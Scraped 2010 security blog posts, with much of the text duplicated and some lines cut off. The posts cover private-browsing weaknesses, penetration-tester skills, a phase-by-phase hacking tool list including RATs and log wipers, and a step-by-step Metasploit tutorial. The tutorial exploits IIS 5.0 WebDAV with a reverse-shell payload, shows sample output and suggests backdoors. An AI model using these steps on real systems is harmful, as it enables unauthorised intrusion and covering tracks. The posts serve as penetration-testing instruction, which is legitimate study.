Sunday, December 12, 2010
Thursday, December 2, 2010
Private Browsing: Not so private after all
”The private browsing features in Internet Explorer, Firefox, Chrome and Safari are not as protective as they promise to be, according to new research.
Privacy modes are designed to protect a browser user from having their online activity tracked by websites or by other people who use the browser on the same computer. However, the way the features are set up means that traces of data can still be found even when the tools are used, according to researchers from Stanford and Carnegie Mellon universities.
The team developed methods to test browser privacy and gave details as to how they pieced together browsing histories. They focused on people with access to the PC after the browsing session, calling these people 'local attackers' in a paper that is due to be presented at the Usenix security conference (PDF) on Wednesday.
Local attackers can access the DNS resolution history in a cache on a machine that uses the latest versions of Internet Explorer (IE), Firefox, Chrome and Safari, enabling the intruder to reconstruct if and when a user visited a website, according to the researchers.
In addition, operating systems swap out browser memory pages during private and non-private browsing sessions, leaving traces of both types of sessions, they said. Other points of entry are browser add-ons (such as plug-ins) and extensions, which leave traces on the hard disk.”
Here is a link to the full article over at ZDNet.Co.UK
Privacy modes are designed to protect a browser user from having their online activity tracked by websites or by other people who use the browser on the same computer. However, the way the features are set up means that traces of data can still be found even when the tools are used, according to researchers from Stanford and Carnegie Mellon universities.
The team developed methods to test browser privacy and gave details as to how they pieced together browsing histories. They focused on people with access to the PC after the browsing session, calling these people 'local attackers' in a paper that is due to be presented at the Usenix security conference (PDF) on Wednesday.
Local attackers can access the DNS resolution history in a cache on a machine that uses the latest versions of Internet Explorer (IE), Firefox, Chrome and Safari, enabling the intruder to reconstruct if and when a user visited a website, according to the researchers.
In addition, operating systems swap out browser memory pages during private and non-private browsing sessions, leaving traces of both types of sessions, they said. Other points of entry are browser add-ons (such as plug-ins) and extensions, which leave traces on the hard disk.”
Here is a link to the full article over at ZDNet.Co.UK
Saturday, November 27, 2010
Ideal Skill Set For the Penetration Testing
Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.
1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?
2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know that structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by Richard Steven (either edition works). Know the difference between TCP and UDP. Understand routing, be able to in detail describe how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?
3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP Spoof or a MiTM attack actually works. In short how can you violate or manipulate a process, if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see it work, the first thing that comes to my mind is “how does it work”.
4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).
5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on ebay, or maybe ask your company for old ones. Start with simple ACL’s on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s not better way to understand these concepts than to apply them. Once you’re mastered this, you can move to a PIX, or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.
6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.
7. Eventually learn a programming language, then learn a few more. Don’t go and by a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!
8. Have a desire and drive to learn new stuff. This is a must; It’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for), to really get a handle on things and stay up to date.
9. Learn a little about databases, and how they work. Go download mysql, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs help.
10. Always be willing to interact and share your knowledge with like minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery, janitorial, one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
Reference:www.google.com
1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?
2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know that structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by Richard Steven (either edition works). Know the difference between TCP and UDP. Understand routing, be able to in detail describe how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?
3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP Spoof or a MiTM attack actually works. In short how can you violate or manipulate a process, if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see it work, the first thing that comes to my mind is “how does it work”.
4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).
5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on ebay, or maybe ask your company for old ones. Start with simple ACL’s on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s not better way to understand these concepts than to apply them. Once you’re mastered this, you can move to a PIX, or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.
6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.
7. Eventually learn a programming language, then learn a few more. Don’t go and by a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!
8. Have a desire and drive to learn new stuff. This is a must; It’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for), to really get a handle on things and stay up to date.
9. Learn a little about databases, and how they work. Go download mysql, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs help.
10. Always be willing to interact and share your knowledge with like minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery, janitorial, one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
Reference:www.google.com
Jose Penetration Tools List
Let me just say that I’m subject to use Backtrack in any phase.
1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers.
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use in almost every phase. I wanna see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)
1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute
Phase 3 Vulnerability Research
1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.
Breaking in
1. Manual exploit code
2. Metasploit
3. Core Impact (Large scale (5000 or more nodes to penetrate).
1. Kerb Crack
2. Pwdump
3. Cain & Able
4. John the Ripper
5. Rainbow Crack
6. Hydra
Trojans & Rootkit
1. I usually make my own. But some good POC ones are Poison Ivy, Nuclear RAT, Netbus.
1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or send packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. Olly Debug (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)
1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to…..)
Phase 1 Passive Reconnaissance
1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers.
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use in almost every phase. I wanna see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)
Phase 2 Scanning
1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute
Phase 3 Vulnerability Research
1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.
Phase 4 Penetration/Hacking
Breaking in
1. Manual exploit code
2. Metasploit
3. Core Impact (Large scale (5000 or more nodes to penetrate).
Password Cracking
1. Kerb Crack
2. Pwdump
3. Cain & Able
4. John the Ripper
5. Rainbow Crack
6. Hydra
Trojans & Rootkit
1. I usually make my own. But some good POC ones are Poison Ivy, Nuclear RAT, Netbus.
Phase 5 Going Deeper
1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or send packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. Olly Debug (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)
Phase 6 Covering Tracks
1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to…..)
Wednesday, November 17, 2010
Metasploit Tutorial
How tough is it to really compromise a system? As an ethical hacking instructor, that is a question that I get asked quite frequently. My usual response to this type of question is to encourage the questioner to try to compromise a system, which they own, to find out the time and skill necessary to compromise a system. There is real value in getting a true sense of what it really takes to actually defeat common security measures. This provides first hand experience that cannot really be duplicated from listening to an industry expert or from reading articles and books. The main reason for this is that there is a lot of misinformation, some intentional and some not, available. The easiest way to determine just how difficult something like compromising systems or defeating wireless encryption is – is to try it for yourself.
Most security professionals are aware attacking and penetrating network devices is getting easier and attack sophistication is getting more complex. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers have uncovered the security weakness is common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to be able to perform more complex attacks than ever though possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing penetration system penetration. Products like Core Security's Core Impact and Immunity's Canvas products (See post:Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support of their products to allow a qualified professional to perform a more methodological penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler.
This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows:
1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit
While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared and utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it can not be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system – the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers this and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. So that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
# " ./msfconsole "
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:
* use
* show
* info
The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST" and press enter. On the next line type "set RPORT 80"
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check ".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below .
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)
What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST". This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it.
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================
Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor.
Metasploit™ – available from http://www.Metasploit™.com
It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.
Most security professionals are aware attacking and penetrating network devices is getting easier and attack sophistication is getting more complex. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers have uncovered the security weakness is common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to be able to perform more complex attacks than ever though possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing penetration system penetration. Products like Core Security's Core Impact and Immunity's Canvas products (See post:Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support of their products to allow a qualified professional to perform a more methodological penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler.
This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows:
1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit
While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared and utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it can not be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system – the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers this and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. So that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
# " ./msfconsole "
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:
* use
* show
* info
The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check ".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below .
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)
What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================
Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
